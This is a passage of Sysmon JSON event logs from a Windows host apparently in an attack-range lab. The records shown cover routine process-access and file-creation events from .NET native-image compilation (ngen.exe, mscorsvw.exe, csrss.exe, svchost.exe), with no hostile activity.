\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.587\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001011280C00}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.587","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001011280C00}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.603\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001011280C00}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.603","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001011280C00}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.744\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-001090D40B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.744","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-001090D40B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.744\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-001090D40B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.744","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-001090D40B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:26.759\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-0010A02B0C00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:26.759","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-0010A02B0C00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:27.400\r\nProcessGuid: {A837DB8D-0446-5F25-0000-0010A02B0C00}\r\nProcessId: 4580\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\System.Runtime.WindowsRuntime.dll\r\nCreationUtcTime: 2020-08-01 05:57:27.400","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:27.400","ProcessGuid":"{A837DB8D-0446-5F25-0000-0010A02B0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\System.Runtime.WindowsRuntime.dll","CreationUtcTime":"2020-08-01 05:57:27.400","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.447\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001050300C00}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.447","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001050300C00}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.447\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001050300C00}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.447","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001050300C00}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6461,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.447\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-001050300C00}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.447","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-001050300C00}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
